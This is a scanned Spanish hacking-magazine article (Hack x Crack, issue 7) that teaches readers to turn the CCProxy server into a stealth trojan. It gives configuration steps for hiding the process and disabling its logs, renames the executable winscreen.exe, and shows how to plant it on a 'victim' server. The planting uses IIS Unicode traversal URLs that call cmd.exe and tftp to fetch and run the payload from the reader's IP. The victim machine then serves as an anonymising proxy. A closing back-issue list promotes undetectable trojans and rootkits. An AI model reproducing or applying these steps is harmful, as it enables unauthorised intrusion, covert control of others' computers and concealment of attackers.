  • 58. CCPROXY: El Cuarto troyano de PC PASO A PASO - Instalaremos un servidor Proxy en nuestro PC - Lo "prepararemos" para transformarlo en un troyano - Lo subiremos a una víctima y lo ejecutaremos - Lo utilizaremos para ocultar nuestra conexión 1.- Conociendo al SR. CCPROXY ADVERTENCIA: En este texto se utilizarán conocimientos adquiridos durante los anteriores 6 números publicados. Si no entiendes algunos de los conceptos que aquí explicaremos es porque hay muchos elementos implícitos, te recomendamos que pidas los número atrasados (al final de esta revista puedes consultar la lista disponible). CCPROXY es un servidor Proxy aparentemente inofensivo pero que por su "peculiar" forma de operar nos va a permitir transformarlo en un troyano, ejecutarlo en una víctima y utilizarlo para anonimizar nuestras "andanzas" por Internet. Ya se ha explicado en anteriores números muchas cosas sobre los proxys, para quien no los ha leído haremos un par de referencias: 1.- Imagina que tienes 5 ordenadores conectados en Red pero solo uno tiene acceso a Internet (que somos pobres y eso de pagar 5 líneas a Telefónica no nos hace gracia), pues bien, instalando el Servidor Proxy en el ordenador que tiene salida a Internet permitirá que los otros 4 PCs puedan acceder a Internet a través de él. Todos los PCs están conectados Ordenadores de nuestra Casa/oficina conectados entre sí mediante la Red Interna en Red y uno con conexión a Internet (Ip Interna) y uno de ellos tiene Ordenador 2 conexión a Internet (IP Externa). IP Interna 192.168.0.2 Cuando el PC número 2 (por Ordenador 3 ejemplo) quiera acceder a Internet, IP Interna 192.168.0.3 PC remoto se conectará al PC1 (192.168.0.1) en el puerto donde está el Servidor Ordenador 1 (T iene un Servidor Proxy Instalado Proxy (8080) y hará de puente. A Intranet escuchando el puerto 8080) www.mocosoft.com www.mocosoft.com IP Interna 192.168.0.1 Internet Internet solo se puede acceder IP Externa 80.37.158.23 IP Externa: 66.111.52.196 66.11 con una IP Externa (ya explicamos Ordenador 4 IP Interna 192.168.0.4 Recibe una petición extensamente todo esto en los de la IP: 80.37.158.23 números anteriores), por lo tanto el PROXY "cederá" su IP Externa Ordenador 5 IP Interna 192.168.0.5 al PC 2 (por eso lo de puente) para que pueda acceder al exterior. Página 58 PC PASO A PASO Nº 7
  • 59. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO El host remoto al que quiere acceder Ordenadores de nuestros W ebs V isitadas el Ordenador 2 (por ejemplo la Web Amiguetes conectados a por los amiguetes Internet desde varios de Mocosoft, www.mocosoft.com) Puntos de España Recibe peticiones de recibirá una petición desde la IP Amiguete 1 la IP 56.111.52.196 56.11 IP Externa 80.65.24.123 80.37.158.23. Para Internet, los 5 equipos de nuestra Intranet es como Recibe peticiones de si fuese uno solo, puesto que TODOS Amiguete 2 la IP 56.111.52.196 56.11 IP Externa 83.54.215.78 tendrán la IP EXTERNA 80.37.158.153 www.mocosoft.com www.mocosoft.com gracias a nuestro Servidor Proxy :) Amiguete 3 IP Externa: Recibe peticiones de IP Externa 89.36.230.235 66.111.52.196 66.11 la IP 56.111.52.196 56.11 También podemos utilizarlo de anonimizador (para ocultar nuestra IP). Recibe peticiones de la IP 56.111.52.196 56.11 Imagina que hackeamos el host de mocosoft, le metemos un Servidor Proxy y para colmo lo "anunciamos" Recibe peticiones de la IP 56.111.52.196 56.11 entre nuestros amigos para que lo utilicen, esto es lo que pasaría: Nuestros amigos, configuran su navegador (Internet Explorer, Netscape… ) para que utilicen a www.mocosoft.com (IP:56.111.52.196) de proxy. Desde ese instante, cualquier Web que visiten nuestros amigos recibirá la IP de mocosoft. 2.- Instalación del CCPROXY en ! Todo esto... nuestro PC. Todo esto se explicó sobradamente en anteriores números. Antes que nada nos descargamos el programa de la Web Oficial (http://www.youngzsoft.net) o de nuestra Web (www.hackxcrack.com) y lo instalamos. No tiene misterios, la instalación es prácticamente automática, por cierto, nosotros lo hemos instalado en la carpeta c:ccproxy. 3.- Configurando el ccproxy: Venga, nos vamos a la carpeta donde lo hemos instalado y vemos unos cuantos archivos y carpetas. El más importante a parte del ejecutable (CCProxy.exe), es el CCProxy.ini. Este último contiene la configuración del CCProxy en un simple archivo de texto, ¿os suena?, muy muy parecido al primer troyano que estudiamos en hack x crack (el serv-u). Otro archivo importante es el accinfo.ini, donde se guardan los usuarios que creemos, este se utiliza en caso de que quieras proteger tu Servidor Proxy de visitas desconocidas, si no saben el user/pass no podrán utilizar nuestro Proxy :) PC PASO A PASO Nº 7 Página 59
  • 60. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO Lo primero que haremos es pinchar sobre el ! Es muy importante... botón OPTIONS y veremos los servicios que tiene este Proxy, no te quejarás ¿verdad? Hay bastantes ;) Es muy importante que sepas elegir bien las herramientas que utilizas. Este programa no es un virus, ni un troyano ni nada parecido, es un software conocido y ningún antivirus dará la alarma si lo ejecutas en un remoto. Por otro lado, la mayoría de los Servidores Proxy guardan su configuración en el registro de Windows (imposible de modificar si no tienes derechos de administrador) y este, en cambio, lo hace en un archivo *.ini que es en realidad un archivo de texto que podemos modificar con el Bloc de notas de Windows ¿Recuerdas el artículo del osito? ¿quedó claro, verdad? Presentándote al Sr. CCProxy te hemos ahorrado muchas horas de búsqueda y pruebas, intenta instalar cualquier otro Proxy y me apuesto lo que quieras a que tardas días en encontrar uno que no toque el registro de Windows para guardar su configuración… por cierto, podríamos habernos montado un Proxy sencillito nosotros mismos con el NETCAT (tocado en el número 3 de hackxcrack), pero eso os lo enseñaré otro día ;p Servicios a Configurar Ahhh!!!, por cierto, puedes hacer que el ccproxy se inicie en español (lo veremos luego), pero eso empezaría a dejar ¿Qué significa todo eso? Verás, para no pistas sobre la procedencia del "infectador", y no nos complicarnos la vida, diremos que un interesa, por lo tanto dejaremos la aplicación en Ingles :) Proxy puede ofrecer varios servicios en puertos distintos. Me explico, un buen Servidor Proxy (en este caso el ccproxy), Nuestra intención es configurar el ccproxy de puede trabajar de formas distintas según sea forma que podamos "traspasarlo" a cualquier su misión: otro ordenador sin que rechiste al ser iniciado remotamente, que sirva a nuestros propósitos - HTTP: Esto nos permite tener un Web-Proxy (anonimizar nuestras conexiones), que quede y NO ACEPTARÁ que le pidas cosas distintas oculto en el remoto y aprendamos cositas por a páginas Web puesto que, aunque el camino. Pues venga, ejecutamos en CCProxy escuche las peticiones en cualquier y nos encontramos con la pantalla de inicio :) puerto solo gestionará correctamente peticiones a Servidores Web (normalmente en el puerto 80). Fíjate en la imagen, nosotros hemos puesto el Servidor Proxy escuchando el puerto 2880. * Oye, perdona, me estoy perdiendo un poco… ¿me lo explicas mejor? Bueno, vale, venga, un dibujo para explicar mejor esta parrafada. Página 60 PC PASO A PASO Nº 7
  • 61. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO Los PC1, 2 y 3 piden páginas Web, si activamos esa opción en el CCProxy PCs en cualquier punto del Planeta Servidores Web visitados Web conectado a Internet que quieren por los PC1, PC2, PC3… tendremos ese servicio. Pero imagina visitar páginas Web de forma anónima Web a través de un W eb-Proxy que esos PC quieren conectarse a www.hackxcrack.com www.hackxcrack.com PC1 escuchando el puerto 80 servidores FTP de forma anónima, pues IP Externa 80.65.24.123 entonces debemos habilitar ese servicio www.eresmas.com www.eresmas.com escuchando el puerto 80 en la configuración del Proxy ;) PC2 IP Externa 83.54.215.78 www.mocosoft.com FTP: Esto nos permite tener un FTP- www.astalavista.com www.astalavista.com PC3 IP Externa: 66.111.52.196 66.11 escuchando el puerto 80 Proxy y NO ACEPTARÁ que le pidas cosas IP Externa 89.36.230.235 W eb-Proxy escuchando distintas puesto que, aunque escuche peticiones externas en el puerto que queramos, en las peticiones en cualquier puerto solo este caso el 2880. www.google.com www.google.com escuchando el puerto 80 gestionará correctamente peticiones a El W eb-Proxy procesará las peticiones de páginas Servidores FTP (normalmente en el Web y se conectará al puerto 80 de los puerto 21). Fíjate en la imagen, nosotros Servidores W eb. hemos puesto el Servidor Proxy escuchando el puerto 3821. Vamos a ver qué está pasando: PCs en cualquier punto del Planeta Servidores FTP visitados 1- El PC 1 (80.65.24.123 conectado a Internet que quieren por los PC1, PC2, PC3… visitar FTPs de forma anónima ) abre su Cliente de FTP a través de un W eb-Proxy ftp.hackxcrack.com (por ejemplo el Flash FXP, PC1 escuchando el puerto 21 IP Externa 80.65.24.123 ampliamente tratado en los números anteriores www.eresmas.com www.eresmas.com escuchando el puerto 21 de esta publicación) y lo PC2 IP Externa 83.54.215.78 configura para que utilice www.mocosoft.com www.astalavista.com www.astalavista.com un FTP-Proxy, en este PC3 IP Externa: 66.111.52.196 66.11 escuchando el puerto 21 IP Externa 89.36.230.235 caso un Servidor FTP- W eb-Proxy escuchando peticiones externas en el Proxy activo en la IP puerto que queramos, en este caso el 3821. www.google.com www.google.com 65.111.52.196 y puerto escuchando el puerto 21 El W eb-Proxy procesará 3821. las peticiones de páginas Web y se conectará al 2.- El PC 1 emite una puerto 21 de los Servidores FTP. FTP. petición de conexión desde su Cliente FTP a, por ejemplo ftp.epson.com 3.- Como el Cliente FTP ha sido configurado escuchando el puerto 21, acepta la petición para utilizar el Proxy instalado en la IP desde la IP 56.111.52.196 y responde 65.111.52.196 y puerto 3821, lo que hace NO inocentemente, no tiene ni idea que la petición ES enviar la petición a ftp.epson.com, sino que procede realmente del PC 1 (80.65.24.123). envía la petición a la IP 65.111.52.196 en el 6.- El FTP-Proxy recibe la respuesta de puerto 3821. ftp.epson.com y la devuelve a PC 1 4.- El FTP-Proxy (65.111.52.196) recibe la (80.65.24.123 ). petición del PC 1 y se conecta a ftp.epson.com Eso mismo ocurre con cada uno de los servicios en el puerto 21 que activemos. Los proxys no solo tienen en 5.- El servidor ftp.epson.com, que está cuenta el puerto al que se conectan, sino el PC PASO A PASO Nº 7 Página 61
  • 62. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO tipo de servicio que hay tras ese puerto (FTP, de administrador sobre el equipo hackeado HTTP, TELNET… …). Piensa que cada servicio saltará un error en plena cara del administrador tiene su propia forma de comunicarse mediante remoto (algo muy poco recomendable) :p un protocolo concreto, por eso el Proxy DEBE - Port Map: Bueno, bueno, bueno… dejo esta SER PROGRAMADO de forma que sepa explicación para cuando hagamos "tunneling". comunicarse con esos servicios. Existe mucho Es un simple mapeo de puertos muy útil para software que alardea de llamarse Proxy pero redirigir puertos y, según como se mire, servicios. que solo admiten uno o dos servicios, CCProxy Por ahora lo dejaremos desactivado porque no es ni de lejos el más completo pero es esto merece un artículo a parte ;) bastante "completito". En la imagen "Servicios a Configurar" puedes No podemos explicar ahora todos los servicios, ver nuestra configuración. Si quieres cambiar por el momento, si has leído esta revista desde los puertos de escucha puedes hacerlo, pero el principio ya conoces el HTTP, Secure http, ten en cuenta que debe ser mayor que 1024 FTP(Web), FTP y telnet. Pues venga, configura debido a que los puertos 1-1024 cantan bastante esos servicios tal y como viste en la foto titulada y son controlados muy de cerca por los firewalls "Servicios a Configurar" (no te vuelvo a poner y otras herramientas del sistema. Te la foto que después en el foro dicen que recomendamos que elijas puertos no "rellenamos la revista" ;p) conocidos/asignados, la lista de los llamados Puertos Conocidos la tienes en el número 6 de Ahora vuelve a mirarte la foto una vez más y PC PASO A PASO. Si utilizas un puerto conocido, te explico un par de cosas: corres el riesgo de "pisar" otro software que - Auto Hide: Esto hace que cuando ejecutes el esté a la escucha en ese puerto y nuestro programa, automáticamente se minimice y solo CCProxy no podrá iniciarse correctamente. quede el Tray Icon junto al reloj del sistema. Je, je, no encontrarás la forma de ocultar ese 4.- Configurando el ccproxy: icono desde la interfaz gráfica, algo poco Avanzada. importante si utilizas para su troyanización el CODE / DECODE (no saldrá el icono), pero si Ahora pulsamos sobre el botón ADVANCED y utilizas cualquier otro BUG el icono nos delatará. nos encontramos con esto. Pues bien, después te enseñaremos a ocultarlo añadiendo una interesante opción directamente en el archivo de configuración (ccproxy.ini) ;p - Auto Startup: En principio es para que los servicios se activen en cuanto ejecutes el p r o g ra m a , m e j o r l o s e l e c c i o n a m o s . - Auto Detect: Esto es genial, cuando subamos este archivo a una víctima no debemos preocuparnos ni tan siquiera de su IP Externa, el CCProxy seleccionará la IP Externa correcta ;) - NT Service: Lo dejamos desactivado, ya hemos explicado muchas veces esta opción en otros programas tratados, esta opción modificaría el registro de Windows y eso no nos interesa puesto que si no tenemos derechos Página 62 PC PASO A PASO Nº 7
  • 63. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO Configúralo como nosotros puesto que vamos Ahora nos vamos a la pestaña LOG y lo a troyanizar conexiones de cable (servidores) desactivamos TODO. No queremos que se y estas opciones son para otros tipos de guarde un registro de nuestras actividades, ni conexiones. de las conexiones entrantes ni de nada de nada ¿verdad? Recuerda que estamos Ahora vamos a la pestaña Cache y lo configurándolo para actuar de troyano en una deshabilitamos TODO. Estas opciones crearían máquina-víctima :) una caché donde guardaría los últimos sitios visitados y esas cosas, parecido a la caché del Internet Explorer: NO NOS INTERESA dejar tantas huellas y mucho menos consumir recursos innecesarios de la Víctima. La pestaña mail déjala como esté, puesto que Ahora iremos a la pestaña Cascading Proxy y no hemos activado ese servicio y no afectará comprobamos que está todo deshabilitado. para nada. Esto nos permitiría por ejemplo, conectar nuestro ccproxy con otros Proxy y así conseguir Ahora nos metemos en la pestaña Miscellaneous, un mayor anonimato, pero nosotros ya tenemos que es muy interesante. conocimientos avanzados sobre el tema y Password Protection: Nos permitiría, por ejemplo, sabemos crear cadenas de proxys con el evitar el uso del Proxy por personas que no SocksCap y el SocksShain ¿verdad? (HackxCrack conozcan la clave. Mejor lo dejamos número 3) ;p desconectado, debemos ser generosos :) Disable external users: Si activas esta opción, el Proxy no permitirá que una IP EXTERNA acceda al Proxy, es decir, el Proxy solo aceptaría peticiones de la Red Local. Nosotros la dejaremos desactivada puesto que queremos meterle el programa a un remoto y conectarnos posteriormente. Languaje: Bueno, dejaremos el inglés, así no damos pistas sobre nuestra procedencia :) HIDE ALL: La activamos sin dudarlo, nos acabamos de cargar el molesto Tray Icon. Ahora PC PASO A PASO Nº 7 Página 63
  • 64. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO ya somos invisibles :) 6.- Configurando el ccproxy: SOCKS 4: Lo activamos, puesto que así nos ¿Dónde está el CCProxy? aseguramos la compatibilidad (habría mucho Ahora cerraremos el programa, volveremos a que decir sobre esto, coge el google e investiga ejecutarlo y aparentemente no pasa nada, pero www.google.com) SÍ, SÍ que pasa. En este momento el CCProxy ya está ejecutándose. ¿cómo lo sabemos? Hay dos maneras muy sencillas: 1.- Pulsamos las teclas Ctrl+Alt+Supr para que nos salga el Administrador de tareas de Windows y pulsamos sobre la pestaña procesos, podremos ver como el CCProxy está ejecutándose :) Listo, pulsamos aceptar, en la siguiente OK y ya tenemos configurado nuestro CCProxy :) 5.- Configurando el ccproxy: 2.- La otra Cuentas. f o r m a , mucho más En principio y interesante, para ser es abrir una generosos, Ventana de dejaremos que Comandos pueda utilizar el (mil veces Proxy cualquier explicada en persona que anteriores conozca su números) e existencia :), si introducir el quieres hacer comando que pruebas de nos listará los acceso poner puertos que usuarios y tal te lo dejamos a ti, que después están a la dicen en nuestro foro (www.hackxcrack.com) escucha: que rellenamos páginas explicando cosas netstat -a -n demasiado sencillas. Página 64 PC PASO A PASO Nº 7
  • 65. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO Podemos ver perfectamente que los puertos Ahora tenemos que subirle los archivos configurados en el CCProxy están "a la escucha" a la víctima. Tenemos varias posibilidades: esperando ansiosos conexiones :) En nuestro - Subimos el "servu" a la víctima (Servidor FTP), caso el 2880, 3821 y 4823. nos conectamos con un Cliente FTP (FlashFXP) y le metemos los archivos Una vez comprobado visto que funciona, donde queramos (esto ya se estudió cerramos el programa desde el Administrador en su momento). Todo esto utilizando de Tareas. el CODE /DECODE bug y el TFTPD (Servidor TFTP). 7.- Preparando el programa para - Subimos los archivos uno a uno mediante el Subirlo a la Víctima: CODE / DECODE y el TFTPD. - Comprimimos todos los archivos en un archivo Lo primero que hacemos, como siempre, es autodescomprimible mediante el CODE / cambiar el nombre del ejecutable (CCProxy.exe) DECODE y el TFTPD, lo ejecutamos para que por otro menos llamativo para que sea se autodescomprima y finalmente ejecutamos confundido cuando el administrador visualice nuestro CCProxy (winscreen.exe) su Administrador de Tareas, por ejemplo podemos llamarlo winscreen.exe (esto ya lo Lo lógico sería utilizar la tercera opción, pero hemos explicado mil veces, como si quieres no tengo espacio en este artículo para enseñar llamarlo winscreen.dll para que desaparezca el paso a paso eso de los Self-Extracting files, así icono, da igual). que utilizaremos el segundo método, lo que Ahora nos vamos al directorio c:ccproxy (donde siempre hemos hecho en hackxcrack. Por cierto, instalamos el ccproxy) y eliminamos todo lo si alguien tiene ya unos cuantos servidores innecesario: hackeados subir los archivos es algo - La carpeta smtp al completo verdaderamente simple. - Todos los archivos de la carpeta languaje excepto el English.ini (el idioma seleccionado 8.- Subiendo el CCProxy a la en la configuración) Víctima y navegando - La carpeta log al completo anónimamente :) - Y de la carpeta principal solo deben quedar estos Subiremos todos los archivos a la víctima, en este caso al servidor de hack x crack mediante el code-decode bug y ayudados del TFTPD, lo haré sin explicaciones ni aclaraciones, hemos dedicado muchas páginas (casi dos revistas enteras) a explicar todo lo que verás en las siguientes líneas, si no lo entiendes seguro que no has leído los anteriores números (el resto ya lo tenéis controlado ;) Después de escanear y localizar el bug code/decode subimos todos los archivos a la víctima (el servidor de Hack x Crack) en, por ejemplo, la carpeta d:WINNTsystem32 PC PASO A PASO Nº 7 Página 65
  • 66. CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO http://80.36.230.235/scripts/..%c0%af../win autoinicializables (que se reinicien junto al nt/system32/cmd.exe?/c+d:winntsystem32 sistema)… esto será muy útil para ir dejando tftp.exe%20-i%20TU-IP-PONLA- ya de lado el "masticado" code-decode. A Q U I % 2 0 g e t % 2 0 winscreen.exe%20d:winntsystem32winscr Espero vuestras críticas respecto este artículo een.exe en el foro de www.hackxcrack.com, porque es, posiblemente, el único texto publicado que no y así con todos ellos. No te olvides de crear empieza desde cero e incluye elementos ya la carpeta languaje y meter dentro el English.ini estudiados. Si no os gustan las cosas explicadas así, tendremos que utilizar más páginas para Una vez están todos arriba, ejecutamos el las mismas cosas y reincidir sobre los temas ccproxy (winscreen.exe) tratados… ya me contareis :) http://80.36.230.235/scripts/..%c0%af../win nt/system32/cmd.exe?/c+d:winntsystem32 winscreen.exe Ahora configuramos nuestro explorador para EL GANADOR DEL que utilice como proxy a la víctima o mejor (mucho mejor) utilizamos el SocksCap apuntando al puerto del SocksChain para lanzar el Explorador y que admita socks4, configurando SORTEO DE UN SUSE previamente el SocksChain para tener como anonimizador el servidor-víctima que acabamos de hackear. LINUX 8.1 DEL MES DE 9.- ¿Has entendido algo del punto 8? ENERO ES: He repasado el artículo un par de veces y posiblemente sea bastante incomprensible para mucha peña y realmente lo siento mucho. En GUSTAVO BARON el próximo artículo, según las dudas que salgan en el foro reincidiré sobre todo esto (mas detalladamente) y explicaré lo de los archivos autoejecutables. Si es necesario incluso explicaré PALMA DE MALLORCA rápidamente como configurar el SocksCap y el SocksChain para utilizar el proxy de la víctima, SEGUIR LLAMANDO, EL PROXIMO pero todo esto ya se ha explicado, simplemente tienes que aplicar los conocimientos adquiridos. PODRIA SER PARA TI (PAG 18) Si no me han informado mal, en el próximo número enseñarán a "asaltar" a los pobres Windows NT por el sistema de ficheros compartidos, además enseñarán a hacerse con el pass del administrador y a transformar todos los troyanos que hemos estudiado en Página 66 PC PASO A PASO Nº 7
  • 67. NÚMERO1: -CREA TU PRIMER TROYANO INDETECTABLE POR LOS ANTIVIRUS. -FLASHFXP: SIN LÍMITE DE VELOCIDAD. -FTP SIN SECRETOS: PASVMODE. -PORT MODE/PASV MODE Y LOS FIREWALL: LA UTILIDAD DE LO APRENDIDO. -TCP-IP:INICIACIÓN (PARTE 1). -EL MEJOR GRUPO DE SERVIDORES FTP DE HABLA HISPANA. -EDONKEY 2000 Y SPANISHARE. -LA FLECHA ÁCIDA. NÚMERO 2: -CODE/DECODE BUG: INTRODUCCIÓN. -CODE/DECODE BUG: LOCALIZACIÓN DEL OBJETIVO. -CODE/DECODE BUG: LÍNEA DE COMANDOS. -CODE/DECODE BUG: SUBIENDO ARCHIVOS AL SERVIDOR REMOTO. -OCULTACIÓN DE IP: PRIMEROS PASOS. -LA FLECHA ÁCIDA: LA SS DIGITAL. AZNAR AL FRENTE DE LA SS DEL SIGLO XXI. NÚMERO 3: -PROXY: OCULTANDO NUESTRA IP. ASUMIENDO CONCEPTOS. -PROXY: OCULTANDO NUESTRA IP. ENCADENANDO PROXIES. -PROXY: OCULTANDO NUESTRA IP. OCULTANDO TODOS NUESTROS PROGRAMAS TRAS LAS CADENAS DE PROXIES. -EL SERVIDOR DE HACKXCRACK CONFIGURACIÓN Y MODO DE EMPLEO. -SALA DE PRACTICAS: EXPLICACIÓN. -PRÁCTICA 1ª: SUBIENDO UN ARCHIVO A NUESTRO SERVIDOR. -PRÁCTICA 2ª: MONTANDO UN DUMP CON EL SERV-U. PRÁCTICA 3ª: CODE/DECODE BUG. LÍNEA DE COMANDOS. -PREGUNTAS Y DUDAS.
  • 68. NÚMERO 4: -CREA TU SEGUNDO TROYANO, INDETECTABLE E INMUNE A LOS ANTIVIRUS. CONOCIENDO EL RADMIN. GESTIONANDO UNA SALA DE ORDENADORES. OCULTANDO EL RADMIN. INSTALANDO EL RADMIN EN EQUIPOS REMOTOS. -OCULTACIÓN DE IP POR NOMBRE DE DOMINIO. -CREA LETRAS DE IMPACTO PARA TUS DOCUMENTOS (LETRAS DE FUEGO). - CONSIGUE UNA IP FIJA. NÚMERO 5: -HACK-OPINION: LA PIRATERÍA EN INTERNET. -ROOTKITS: LA PESADILLA DE CUALQUIER ADMINISTRADOR. -ROOTKITS: EL SR. NTROOT. -WAREZ: APPZ, GAMEZ, MP3Z, DIVX, FTPZ, 0-DAY. -APRENDIENDO A COMPILAR PROGRAMAS. COMPILA TU PROPIO NETCAT. -BUGS, ERRORES Y OTRAS FORMA DE JOD... -NETBIOS: ESTUDIO Y PENETRACIÓN DE SISTEMAS. -ASESINADOS POR LA LSSI. -LISTADO DE ORDENES PARA NETBIOS. -HACK-OPINION: PAGOS POR INTERNET SEGUROS YÁ. NÚMERO 6: - PASA TUS PELICULAS A DIVX (STREAMING) - PASA TUS PELICULAS A DIVX II (CODEC DIVX) - PUERTOS & SERVICIOS - eMule: EL NUEVO REY DEL P2P - NUEVA SECCION: PROGRAMACION DESDE 0 - CURSO DE VISUAL BASIC -IPHXC: EL TERCER TROYANO DE HXC - TENDENCIAS ACTUALES EN CODIGO MALICIOSO - OCULTACION DE FICHEROS. METODO STREAM (ads) - TRASTEANDO CON EL HARDWARE DE UNA LAN